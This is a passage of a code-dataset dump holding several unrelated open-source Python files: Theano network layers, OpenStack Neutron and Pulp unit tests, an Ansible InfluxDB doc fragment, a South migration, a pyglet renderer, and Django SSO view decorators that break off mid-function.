super(MaxPoolLayer, self).__init__(inputs)
self.pool_size = pool_size
self.ignore_border = ignore_border
if stride is None:
stride = pool_size
self.stride = stride
self.params = []
self.outputs = max_pool_2d(
input=self.inputs,
ds=self.pool_size,
ignore_border=self.ignore_border,
st=self.stride
)
self.outputs_shape = (
self.inputs_shape[0],
self.inputs_shape[1],
#int(np.ceil((self.inputs_shape[2] - pool_size[0]) / np.float32(stride[0]))) + 1,
#int(np.ceil((self.inputs_shape[3] - pool_size[1]) / np.float32(stride[1]))) + 1
(self.inputs_shape[2] - pool_size[0]) // stride[0] + 1,
(self.inputs_shape[3] - pool_size[1]) // stride[1] + 1
)
class ConvBiasLayer(Layer):
def __init__(self, inputs, name):
"""
Add bias
"""
self.name = name
super(ConvBiasLayer, self).__init__(inputs)
self.b = theano.shared(
np.zeros(
(self.inputs_shape[1],), dtype=theano.config.floatX
), name='{0}_b'.format(self.name)
)
self.params = [self.b]
self.outputs = self.inputs + self.b.dimshuffle('x', 0, 'x', 'x')
self.outputs_shape = self.inputs_shape
class RandCropAndFlip(Layer):
def __init__(self, inputs, image_shape, patch_size, name, theano_rng, mode_var):
# one window for whole batch
self.name = name
super(RandCropAndFlip, self).__init__(inputs, image_shape)
self.patch_size = patch_size
self.theano_rng = theano_rng
self.mode = mode_var
self.params = []
print 'self.inputs_shape: {0}'.format(self.inputs_shape, )
print 'patch_size: {0}'.format(patch_size, )
print 'self.inputs_shape[2] - patch_size[0]: {0}'.format(self.inputs_shape[2] - patch_size[0], )
print 'self.inputs_shape[3] - patch_size[1]: {0}'.format(self.inputs_shape[2] - patch_size[0], )
self.rand_row_coord = self.theano_rng.random_integers(
low=0, high=self.inputs_shape[2] - patch_size[0])
self.rand_col_coord = self.theano_rng.random_integers(
low=0, high=self.inputs_shape[3] - patch_size[1])
self.center_row_coord = (self.inputs.shape[2] - patch_size[0]) // 2
self.center_col_coord = (self.inputs.shape[3] - patch_size[1]) // 2
self.row_coord = T.switch(
self.mode, self.center_row_coord, self.rand_row_coord)
self.col_coord = T.switch(
self.mode, self.center_col_coord, self.rand_col_coord)
self.patches = self.inputs[:,
:,
self.row_coord:self.row_coord + patch_size[0],
self.col_coord:self.col_coord + patch_size[1]]
self.flipped = self.patches[:,:,:,::-1]
self.doflip = self.theano_rng.binomial(
n=1, p=.5, size=(self.inputs.shape[0],))
# if train mode: randomly flip, else don't flip
self.outputs = T.switch(
self.mode,
self.patches,
T.switch(self.doflip.dimshuffle(0,'x','x','x'), self.flipped, self.patches))
self.outputs_shape = self.inputs_shape[:2] + self.patch_size
class Dropout(Layer):
def __init__(self, inputs, dropout_rate, name, theano_rng, mode_var, inputs_shape=None):
"""Dropout
Args
----
mode_var: symbolic variable, which has value 0 during training and 1
during test time
"""
self.name = name
super(Dropout, self).__init__(inputs, inputs_shape)
self.dropout_rate = theano.shared(
dropout_rate, '{0}_dropout_rate'.format(name))
self.theano_rng = theano_rng
self.mode = mode_var
self.params = []
self.mask = self.theano_rng.binomial(
n=1, p=1 - dropout_rate, size=self.inputs_shape,
dtype=theano.config.floatX)
self.outputs = T.switch(self.mode,
self.inputs * (1. - dropout_rate),
self.inputs * self.mask)
self.outputs_shape = self.inputs_shape
class AffineLayer(Layer):
def __init__(self, rng, inputs, nouts,
name, init_scale=None, nins=None, with_bias=True,
inputs_shape=None):
"""
Fully connected layer with bias option
Args
----
rng: instance of numpy.random.RandomState
"""
self.name = name
super(AffineLayer, self).__init__(inputs, inputs_shape=inputs_shape)
self.rng = rng
self.nins = self.inputs_shape[-1]
self.nouts = nouts
if init_scale is None:
# if we don't specify a scale for weight initialization,
# we use the formula
# 1/sqrt(number of weights in each filter)
init_scale = 1. / np.sqrt(self.nins)
self.init_scale = init_scale
self.with_bias = with_bias
self.W = theano.shared(
np.asarray(
rng.uniform(low=-self.init_scale, high=self.init_scale,
size=(self.nins, self.nouts)),
dtype=theano.config.floatX
), name='{0}_W'.format(self.name)
)
self.params = [self.W]
self.outputs = T.dot(self.inputs, self.W)
if with_bias:
self.b = theano.shared(
np.zeros(
self.nouts, dtype=theano.config.floatX
), name='{0}_b'.format(self.name)
)
self.params.append(self.b)
self.outputs = self.outputs + self.b
self.outputs_shape = (self.inputs_shape[0], self.nouts)
class Relu(Layer):
def __init__(self, inputs, name):
"""
Relu activation function
"""
self.name = name
super(Relu, self).__init__(inputs)
self.params = []
self.outputs = T.switch(self.inputs < 0, 0, self.inputs)
self.outputs_shape = self.inputs_shape
class RectifiedTanh(Layer):
def __init__(self, inputs, name):
"""
Relu activation function
"""
self.name = name
super(RectifiedTanh, self).__init__(inputs)
self.params = []
self.outputs = T.switch(self.inputs < 0, 0, T.tanh(self.inputs))
self.outputs_shape = self.inputs_shape
class Concat(Layer):
def __init__(self, inputs_list, name, axis,
inputs_shape_list=None):
"""
Concatenation layer
"""
self.name = name
self.axis = axis
if inputs_shape_list is None:
inputs_shape_list = [None] * len(inputs_list)
assert len(inputs_shape_list) == len(inputs_list)
self.inputs = []
self.inputs_shape = []
for i, inp in enumerate(inputs_list):
if isinstance(inp, Layer):
self.inputs.append(inp.outputs)
self.inputs_shape.append(inp.outputs_shape)
else:
assert(inputs_shape_list[i] is not None)
self.inputs.append(inp)
self.inputs_shape.append(inputs_shape_list[i])
self.params = []
# concatenate the inputs
self.outputs = T.concatenate(self.inputs, axis=axis)
self.outputs_shape = list(self.inputs_shape[0])
for i in range(1, len(self.inputs_shape)):
self.outputs_shape[axis] += self.inputs_shape[i][axis]
class Softmax(Layer):
def __init__(self, inputs, name):
"""
Softmax
"""
self.name = name
super(Softmax, self).__init__(inputs)
self.params = []
self.outputs = T.nnet.softmax(self.inputs)
self.outputs_shape = self.inputs_shape
class Sigmoid(Layer):
def __init__(self, inputs, name):
"""
Sigmoid
"""
self.name = name
super(Sigmoid, self).__init__(inputs)
self.params = []
self.outputs = T.nnet.sigmoid(self.inputs)
self.outputs_shape = self.inputs_shape
class Reshape(Layer):
def __init__(self, inputs, shape, name):
"""
Reshaping
"""
self.name = name
super(Reshape, self).__init__(inputs)
self.params = []
assert(np.prod(self.inputs_shape) == np.prod(shape))
self.outputs = T.reshape(self.inputs, shape)
self.outputs_shape = shape
class Composite(Layer):
def __init__(self, layers, name):
"""
Collection of layers used in fusion
"""
self.layers = layers
self.name = name
super(Composite, self).__init__(self.layers[0].inputs,
self.layers[0].inputs_shape)
self.params = []
for layer in self.layers:
self.params.extend(layer.params)
self.outputs = self.layers[-1].outputs
self.outputs_shape = self.layers[-1].outputs_shape
| mit | -448,630,419,246,895,500 | 29.456422 | 104 | 0.520379 | false |
shakamunyi/neutron-vrrp | neutron/tests/unit/ofagent/ofa_test_base.py | 2 | 2430 | # Copyright (C) 2014 VA Linux Systems Japan K.K.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Fumihiko Kakuma, VA Linux Systems Japan K.K.
# @author: YAMAMOTO Takashi, VA Linux Systems Japan K.K.
import mock
from oslo.config import cfg
from neutron.openstack.common import importutils
from neutron.tests import base
from neutron.tests.unit.ofagent import fake_oflib
class OFAAgentTestBase(base.BaseTestCase):
_AGENT_NAME = 'neutron.plugins.ofagent.agent.ofa_neutron_agent'
def setUp(self):
self.fake_oflib_of = fake_oflib.patch_fake_oflib_of()
self.fake_oflib_of.start()
self.addCleanup(self.fake_oflib_of.stop)
self.mod_agent = importutils.import_module(self._AGENT_NAME)
super(OFAAgentTestBase, self).setUp()
self.ryuapp = mock.Mock()
def setup_config(self):
cfg.CONF.set_default('firewall_driver',
'neutron.agent.firewall.NoopFirewallDriver',
group='SECURITYGROUP')
cfg.CONF.register_cli_opts([
cfg.StrOpt('ofp-listen-host', default='',
help='openflow listen host'),
cfg.IntOpt('ofp-tcp-listen-port', default=6633,
help='openflow tcp listen port')
])
cfg.CONF.set_override('root_helper', 'fake_helper', group='AGENT')
def _mk_test_dp(self, name):
ofp = importutils.import_module('ryu.ofproto.ofproto_v1_3')
ofpp = importutils.import_module('ryu.ofproto.ofproto_v1_3_parser')
dp = mock.Mock()
dp.ofproto = ofp
dp.ofproto_parser = ofpp
dp.__repr__ = mock.Mock(return_value=name)
return dp
def _mk_test_br(self, name):
dp = self._mk_test_dp(name)
br = mock.Mock()
br.datapath = dp
br.ofproto = dp.ofproto
br.ofparser = dp.ofproto_parser
return br
| apache-2.0 | -1,743,874,124,726,565,000 | 36.384615 | 78 | 0.641564 | false |
Azulinho/ansible | lib/ansible/utils/module_docs_fragments/influxdb.py | 1 | 1914 | # Copyright: (c) 2017, Ansible Project
# Copyright: (c) 2017, Abhijeet Kasurde ([email protected])
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
class ModuleDocFragment(object):
# Parameters for influxdb modules
DOCUMENTATION = '''
options:
hostname:
description:
- The hostname or IP address on which InfluxDB server is listening
required: true
username:
description:
- Username that will be used to authenticate against InfluxDB server
default: root
password:
description:
- Password that will be used to authenticate against InfluxDB server
default: root
port:
description:
- The port on which InfluxDB server is listening
default: 8086
database_name:
description:
- Name of the database.
required: true
validate_certs:
description:
- If set to C(no), the SSL certificates will not be validated.
- This should only set to C(no) used on personally controlled sites using self-signed certificates.
default: true
version_added: "2.5"
ssl:
description:
- Use https instead of http to connect to InfluxDB server.
default: False
version_added: "2.5"
timeout:
description:
- Number of seconds Requests will wait for client to establish a connection.
default: None
version_added: "2.5"
retries:
description:
- Number of retries client will try before aborting.
- C(0) indicates try until success.
default: 3
version_added: "2.5"
use_udp:
description:
- Use UDP to connect to InfluxDB server.
default: False
version_added: "2.5"
udp_port:
description:
- UDP port to connect to InfluxDB server.
default: 4444
version_added: "2.5"
proxies:
description:
- HTTP(S) proxy to use for Requests to connect to InfluxDB server.
default: None
version_added: "2.5"
'''
| gpl-3.0 | 3,383,564,692,926,135,300 | 27.567164 | 103 | 0.684953 | false |
nthien/pulp | server/test/unit/server/event/test_email.py | 9 | 6189 | import dummy_threading
import smtplib
import unittest
try:
from email.parser import Parser
except ImportError:
# for python 2.4
from email.Parser import Parser
# needed to create unserializable ID
from bson.objectid import ObjectId as _test_objid
import mock
from pulp.server.compat import json
from pulp.server.config import config
from pulp.server.event import data, mail
from pulp.server.managers import factory
class TestSendEmail(unittest.TestCase):
@mock.patch('smtplib.SMTP')
def test_basic(self, mock_smtp):
# send a message
mail._send_email('hello', 'stuff', '[email protected]')
mock_smtp.assert_called_once_with(host=config.get('email', 'host'),
port=config.getint('email', 'port'))
# verify
mock_sendmail = mock_smtp.return_value.sendmail
self.assertEqual(mock_sendmail.call_count, 1)
self.assertEqual(mock_sendmail.call_args[0][0],
config.get('email', 'from'))
self.assertEqual(mock_sendmail.call_args[0][1], '[email protected]')
# verify message attributes
message = Parser().parsestr(mock_sendmail.call_args[0][2])
self.assertEqual(message.get_payload(), 'stuff')
self.assertEqual(message.get('Subject', None), 'hello')
self.assertEqual(message.get('From', None), config.get('email', 'from'))
self.assertEqual(message.get('To', None), '[email protected]')
@mock.patch('smtplib.SMTP')
@mock.patch('logging.Logger.error')
def test_connect_failure(self, mock_error, mock_smtp):
mock_smtp.side_effect = smtplib.SMTPConnectError(123, 'aww crap')
mail._send_email('hello', 'stuff', '[email protected]')
self.assertTrue(mock_error.called)
@mock.patch('smtplib.SMTP')
@mock.patch('logging.Logger.error')
def test_send_failure(self, mock_error, mock_smtp):
mock_smtp.return_value.sendmail.side_effect = smtplib.SMTPRecipientsRefused(
['[email protected]'])
mail._send_email('hello', 'stuff', '[email protected]')
self.assertTrue(mock_error.called)
class TestHandleEvent(unittest.TestCase):
def setUp(self):
self.notifier_config = {
'subject': 'hello',
'addresses': ['[email protected]', '[email protected]']
}
self.event = mock.MagicMock()
self.event.payload = 'stuff'
self.event.data.return_value = self.event.payload
# don't actually spawn a thread
@mock.patch('threading.Thread', new=dummy_threading.Thread)
@mock.patch('ConfigParser.SafeConfigParser.getboolean', return_value=False)
@mock.patch('smtplib.SMTP')
def test_email_disabled(self, mock_smtp, mock_getbool):
mail.handle_event(self.notifier_config, self.event)
self.assertFalse(mock_smtp.called)
# don't actually spawn a thread
@mock.patch('threading.Thread', new=dummy_threading.Thread)
@mock.patch('ConfigParser.SafeConfigParser.getboolean', return_value=True)
@mock.patch('smtplib.SMTP')
def test_email_enabled(self, mock_smtp, mock_getbool):
mail.handle_event(self.notifier_config, self.event)
# verify
self.assertEqual(mock_smtp.call_count, 2)
mock_sendmail = mock_smtp.return_value.sendmail
self.assertEqual(mock_sendmail.call_args[0][0],
config.get('email', 'from'))
self.assertTrue(mock_sendmail.call_args[0][1] in self.notifier_config['addresses'])
# verify message attributes
message = Parser().parsestr(mock_sendmail.call_args[0][2])
self.assertEqual(json.loads(message.get_payload()), self.event.payload)
self.assertEqual(message.get('Subject', None), self.notifier_config['subject'])
self.assertEqual(message.get('From', None), config.get('email', 'from'))
self.assertTrue(message.get('To', None) in self.notifier_config['addresses'])
@mock.patch('pulp.server.event.data.task_serializer')
# tests bz 1099945
@mock.patch('threading.Thread', new=dummy_threading.Thread)
@mock.patch('ConfigParser.SafeConfigParser.getboolean', return_value=True)
@mock.patch('smtplib.SMTP')
def test_email_serialize_objid(self, mock_smtp, mock_getbool, mock_task_ser):
event_with_id = data.Event('test-1', {'foo': _test_objid()})
mock_task_ser.return_value = 'serialized task'
# no TypeError = success
mail.handle_event(self.notifier_config, event_with_id)
class TestSystem(unittest.TestCase):
# test integration with the event system
def setUp(self):
self.notifier_config = {
'subject': 'hello',
'addresses': ['[email protected]', '[email protected]']
}
self.event_doc = {
'notifier_type_id': mail.TYPE_ID,
'event_types': data.TYPE_REPO_SYNC_FINISHED,
'notifier_config': self.notifier_config,
}
@mock.patch('pulp.server.event.data.task_serializer')
# don't actually spawn a thread
@mock.patch('threading.Thread', new=dummy_threading.Thread)
# mock qpid, because it freaks out over dummy_threading
@mock.patch('pulp.server.managers.event.remote.TopicPublishManager')
# don't actually send any email
@mock.patch('smtplib.SMTP')
# act as if the config has email enabled
@mock.patch('ConfigParser.SafeConfigParser.getboolean', return_value=True)
# inject fake results from the database query
@mock.patch('pulp.server.db.model.event.EventListener.get_collection')
def test_fire(self, mock_get_collection, mock_getbool, mock_smtp, mock_publish, mock_task_ser):
# verify that the event system will trigger listeners of this type
mock_get_collection.return_value.find.return_value = [self.event_doc]
mock_task_ser.return_value = 'serialized task'
event = data.Event(data.TYPE_REPO_SYNC_FINISHED, 'stuff')
factory.initialize()
factory.event_fire_manager()._do_fire(event)
# verify that the mail event handler was called and processed something
self.assertEqual(mock_smtp.return_value.sendmail.call_count, 2)
| gpl-2.0 | 8,384,764,055,739,574,000 | 42.27972 | 99 | 0.665697 | false |
siggame/PyVis | pyz/renderer.py | 1 | 14635 | '''
The renderer is responsible for building the primitives, and complex objects to be drawn by pyglet. This module also contains various base classes for primitives which can be modified on the fly.
'''
from copy import copy
from pyglet import clock
from pyglet import gl
from pyglet import graphics
import math
class Drawable(object):
x = property(
lambda self: self._x,
lambda self, x: self.transform(translate=(x, self._y)))
y = property(
lambda self: self._y,
lambda self, y: self.transform(translate=(self._x, y)))
width = property(
lambda self: self._width,
lambda self, width: self.transform(scale=(width, self._height))
)
height = property(
lambda self: self._height,
lambda self, height: self.transform(scale=(self._width, height))
)
color = property(
lambda self: self._color,
lambda self, color: self.transform(color=color)
)
class Primitive(Drawable):
'''
This is the base class for any primitive to draw to the screen. To be used most effectively, all library-provided primitives should be declared within :class:`renderer.Renderer`.
:param renderer: renderer instance to add this primitive to.
:type renderer: :class:`renderer.Renderer`
:raises: AttributeError if renderer is not passed to constructor and not instantiated from an instance of a renderer
'''
def __init__(self, renderer=None, offset=(0, 0)):
self.off_x, self.off_y = offset
self.vertex_list = None
if not renderer:
try:
renderer = self.renderer
except AttributeError as e:
print(
'''You must either pass in renderer argument to '''
'''the primitive or use renderer.Primitive()''')
raise e
else:
self.renderer = renderer
class Composite(Drawable):
'''
This is the base class for any object that uses one or more primitives to function.
'''
def __init__(self, renderer):
self.primitives = []
self._renderer = renderer
def transform(self, translate=None, scale=None, rotate=None):
if scale:
raise Exception('This needs to be overridden by the composite you'
'wish to scale.')
for p in self.primitives:
p.transform(translate=translate, rotate=rotate)
class Renderer(object):
'''
This class allows access to the primitives (the basic drawing building blocks) to draw just about anything. Widgets should use these to draw themselves::
class Button(RectWidget):
def __init__(self, renderer, x, y, width, height, text):
btn_base = renderer.Rectangle(x, y, width, height,
color=(0.2, 0.3, 0.2))
btn_text = renderer.Text(x, y, width, height, text)
# etc.
# etc.
primitives should be called through the Renderer instance instead of through the class (i.e.)::
renderer = Renderer()
renderer.Rectangle()
instead of::
renderer = Renderer()
Renderer.Rectangle(renderer=renderer)
There is special python magic to make that work. See `__init__()` for that.
'''
fg_color = (1, 0.5, 0.5, 1)
bg_color = (1, 1, 1, 1)
texture = None
def __init__(self):
self.fps_display = clock.ClockDisplay()
self.init_frame()
self.frame = graphics.Batch()
# -*- WARNING -*-
# -*- Python magic -*-
# Luckily this only has to be called once per renderer
# and per program there is on average 1.0 renderer
# (Actually it might be useful to have two of these...)
# Finds all classes in Renderer that inherit Primitive
# at some point, and for each, creates a copy for this
# instance and sets the renderer attribute for each
# to this instance.
# This is just so we can do stuff like renderer.Rectangle()
# without having to pass in the renderer because that doesn't
# make any sense.
# -*- Python magic -*-
# -*- WARNING -*-
for name in dir(self):
cls = getattr(self, name)
if hasattr(cls, '__mro__') and Primitive in cls.__mro__:
setattr(self, name, type(name, (cls,), dict(renderer=self)))
def init_frame(self):
'''
This method should be called at the beginning of every game loop.
It does the pre-loop set up, if any.
:rtype: None
'''
pass
def draw_frame(self):
'''
This method should be called at (or near) the end of every game loop after all the objects have been updated and are ready to draw to the screen.
This will draw the batch associated with the renderer.
:rtype: None
'''
self.frame.draw()
self.fps_display.draw()
class Arc(Primitive):
'''
This class creates an arc primitive for which circles and pies (yum!) can be created.
:param x: The x offset (from the left side of the screen) to the arc center
:type x: float
:param y: The y offset (from the bottom of the screen) to the arc center
:type y: float
:param radius: The radius of the arc
:type radius: float
:param points: The number of vertices to make up the arc
:type points: int
:param start: The starting position of the pie in degrees
:type start: float
:param end: The ending position of the pie in degrees
:type end: float
:param filled: The arc appears as a pie because it will be filled with color
:type filled: bool
:param loop: If not filled, this will set whether the first and last points join at the middle or just an arc is created.
:type loop: bool
'''
def __init__(self, x, y, radius, points=20, texture=None, group=None, color=None,
filled=True, loop=True, start=0, end=360, **kwargs):
super(Renderer.Arc, self).__init__(**kwargs)
self._x, self._y = x, y
self._radius = radius
self._points = points
self._start, self._end = start, end
self._filled = filled
self._loop = loop
if not color:
color = self.renderer.fg_color
data = [
('v2f', (0,) * points * 2),
('c4f', (color) * points)
]
if texture:
raise Exception('Not Yet Implemented')
'''
data += [
('t2f',
(0, 0,
1, 0,
1, 1,
0, 1))
]
group = graphics.TextureGroup(texture, parent=group)
'''
indices = []
if filled:
# TODO: Change this to gl.GL_TRIANGLE_FAN when pyglet has fixed its
# allocator issues around TRIANGLE_FANs and LINE_LOOPs
mode = gl.GL_TRIANGLES
for p in range(points - 1):
indices += [0, p, p + 1]
else:
for p in range(points - 1):
indices += [p, p + 1]
if loop:
indices = [0, 1] + indices + [points - 1, 0]
mode = gl.GL_LINES
self.vertex_list = self.renderer.frame.add_indexed(points, mode,
group, indices, *data)
self.transform()
def transform(self, translate=None, scale=None, rotate=None,
start=None, end=None):
'''
This transform method actually modifies the vertex lists to update the positions of the polygons. This is most efficient when in unit-mode where only one unit is moving at a time.
This is because at this point very few objects are moving per frame. So all objects that have not moved take up zero cpu time.
This may not be as efficient when applied to normal, condensed, or liquid mode because far more polygons will be moving at the same time. It may be better to draw each vertex list separately after having gone through a matrix transformation.
As a final note, it may be best to move these primitives into a class built in cython so that python doesn't have to deal with all this bullshit processing.
As an addendum to my final note, it may be sufficient to move this processing to another python process (see multiprocessing), instead of using cython.
Or just use both.
:param translate: The new position.
:type translate: 2-tuple of float or int
:param scale: The new scale.
:type scale: 2-tuple of float or int
'''
if translate:
self._x, self._y = translate
if scale:
self._radius = scale
if start:
self._start = start
if end:
self._end = end
start = math.radians(self._start)
end = math.radians(self._end)
if self._filled or self._loop:
point_count = self._points - 1
else:
point_count = self._points
interval = (end - start) / (point_count - 1)
points = []
t = start
for p in range(point_count):
x = (self._x + self.off_x) + self._radius * math.cos(t)
y = (self._y + self.off_y) + self._radius * math.sin(t)
points += [x, y]
t += interval
if self._filled or self._loop:
if not self._filled and self._start % 360 == self._end % 360:
points = points[0:2] + points
else:
points = [self._x + self.off_x, self._y + self.off_y] + points
self.vertex_list.vertices[:] = points
radius = property(
lambda self: self._radius,
lambda self, radius: self.transform(radius=radius)
)
start = property(
lambda self: self._start,
lambda self, start: self.transform(start=start)
)
end = property(
lambda self: self._end,
lambda self, end: self.transform(end=end)
)
class Rectangle(Primitive):
'''
This class creates a rectangle primitive.
:param x: the x offset (from the left side of the screen) to draw the rectangle.
:type x: float
:param y: is the y offset (from the bottom of the screen) to draw the rectangle.
:type y: float
:param width: is the width of the rectangle
:type width: float
:param height: is the height of the rectangle
:type height: float
:param texture: is the texture to paint the rectangle with
:type texture:
:param group: is the group, if any, that the rectangle should be associated with. Using texture will automatically make this a part of the appropriate TextureGroup and make *group* its parent.
:type group: Group
:param color: is the color to paint the rectangle. If not specified, the renderer's default `fg_color` will be used instead.
:type color: 3-tuple or 4-tuple of floats from 0 to 1
:param filled: specified whether to draw this as a filled-in rectangle or rectangle outline.
:type filled: bool
'''
def __init__(self, x, y, width, height, texture=None,
group=None, color=None, filled=True, **kwargs):
super(Renderer.Rectangle, self).__init__(**kwargs)
self._x, self._y = x, y
self._width, self._height = width, height
if not color:
self._color = self.renderer.fg_color
else:
self._color = color
data = [
('v2f', (0,) * 8),
('c4f', (self._color) * 4)
]
if texture:
data += [
('t2f',
(0, 0,
1, 0,
1, 1,
0, 1))
]
group = graphics.TextureGroup(texture, parent=group)
if filled:
# TODO: Change this to gl.GL_TRIANGLE_FAN when pyglet has fixed its
# allocator issues around TRIANGLE_FANs and LINE_LOOPs
mode = gl.GL_TRIANGLES
indices = [0, 1, 2, 0, 2, 3]
else:
mode = gl.GL_LINES
indices = [0, 1, 1, 2, 2, 3, 3, 0]
self.vertex_list = self.renderer.frame.add_indexed(4, mode, group,
indices, *data)
self.transform()
def transform(self, translate=None, scale=None, rotate=None, color=None):
'''
This transform method actually modifies the vertex lists to update the positions of the polygons. This is most efficient when in unit-mode where only one unit is moving at a time.
This is because at this point very few objects are moving per frame. So all objects that have not moved take up zero cpu time.
This may not be as efficient when applied to normal, condensed, or liquid mode because far more polygons will be moving at the same time. It may be better to draw each vertex list separately after having gone through a matrix transformation.
As a final note, it may be best to move these primitives into a class built in cython so that python doesn't have to deal with all this bullshit processing.
:param translate: The new position.
:type translate: 2-tuple of float or int
:param scale: The new scale.
:type scale: 2-tuple of float or int
'''
if color and color != self._color:
self._color = color
self.vertex_list.colors[:] = (color) * 4
if translate:
self._x, self._y = translate
if scale:
self._width, self._height = scale
x = self._x + self.off_x
y = self._y + self.off_y
self.vertex_list.vertices[:] = [
x, y,
x + self._width, y,
x + self._width, y + self._height,
x, y + self._height
]
| bsd-3-clause | 2,768,834,429,942,911,000 | 33.928401 | 254 | 0.553263 | false |
davidyezsetz/kuma | kuma/search/migrations/0008_auto__add_field_filtergroup_slug.py | 5 | 4651 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'FilterGroup.slug'
db.add_column('search_filtergroup', 'slug',
self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'FilterGroup.slug'
db.delete_column('search_filtergroup', 'slug')
models = {
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'search.filter': {
'Meta': {'unique_together': "(('name', 'slug'),)", 'object_name': 'Filter'},
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'filters'", 'to': "orm['search.FilterGroup']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'operator': ('django.db.models.fields.CharField', [], {'default': "'OR'", 'max_length': '3'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'})
},
'search.filtergroup': {
'Meta': {'ordering': "('-order', 'name')", 'object_name': 'FilterGroup'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
'search.index': {
'Meta': {'ordering': "['-created_at']", 'object_name': 'Index'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'populated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'promoted': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'search.outdatedobject': {
'Meta': {'object_name': 'OutdatedObject'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'outdated_objects'", 'to': "orm['search.Index']"}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {})
},
'taggit.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'})
},
'taggit.taggeditem': {
'Meta': {'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_tagged_items'", 'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_items'", 'to': "orm['taggit.Tag']"})
}
}
complete_apps = ['search']
| mpl-2.0 | 8,975,264,999,760,554,000 | 59.402597 | 174 | 0.546764 | false |
miing/mci_migo | webui/decorators.py | 1 | 10822 | # Copyright 2010 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
import functools
import logging
from datetime import datetime, timedelta
from functools import wraps
from hashlib import sha1
from django.contrib import messages
from django.contrib.auth import REDIRECT_FIELD_NAME, logout
from django.contrib.auth.decorators import (
login_required as django_login_required,
)
from django.conf import settings
from django.contrib.auth.views import redirect_to_login
from django.core.cache import cache
from django.core.urlresolvers import reverse
from django.http import (
Http404,
HttpResponseForbidden,
HttpResponseRedirect,
)
from django.template import RequestContext
from django.template.loader import render_to_string
from django.template.response import TemplateResponse
from django.utils.decorators import available_attrs
from django.utils.http import urlencode
from django.utils.translation import ugettext as _
from identityprovider.cookies import set_test_cookie, test_cookie_worked
from identityprovider.models import twofactor
from identityprovider.views.utils import get_rpconfig_from_request
EMAIL_INVALIDATED = _(
'We received a request to remove the email address {email} from your '
'account. This email address was previously linked to your account but '
'was never verified by you. You will no longer be able to login to your '
'account using {email}.'
)
def redirect_home_if_logged_in(func):
@functools.wraps(func)
def _redirect_home_if_logged_in(request, *args, **kwargs):
if request.user.is_authenticated():
return HttpResponseRedirect('/')
else:
return func(request, *args, **kwargs)
return _redirect_home_if_logged_in
def dont_cache(func):
def _dont_cache_decorator(request, *args, **kwargs):
response = func(request, *args, **kwargs)
response["Expires"] = "Tue, 03 Jul 2001 06:00:00 GMT"
response["Cache-Control"] = ("no-store, no-cache, "
"must-revalidate, max-age=0")
response['Pragma'] = 'no-cache'
return response
return _dont_cache_decorator
def _has_only_invalidated_emails(request):
# user has *zero* usable email addresses, log him/her out
if request.user.emailaddress_set.count() == 0:
logout(request)
return TemplateResponse(
request, 'account/user_logged_out_no_valid_emails.html')
def _has_invalidated_emails_add_warning(request):
emails = request.user.invalidatedemailaddress_set.filter(
account_notified=False).order_by('date_invalidated')
if len(emails) > 0:
invalid = emails[0]
messages.warning(request, EMAIL_INVALIDATED.format(email=invalid))
invalid.account_notified = True
invalid.save()
def sso_login_required(function=None, redirect_field_name=REDIRECT_FIELD_NAME,
login_url=None, require_twofactor=False,
require_twofactor_freshness=False):
"""Wrap up django's login_required, and also checks for 2f."""
def decorator(view_func):
@wraps(view_func, assigned=available_attrs(view_func))
def _wrapped_view(request, *args, **kwargs):
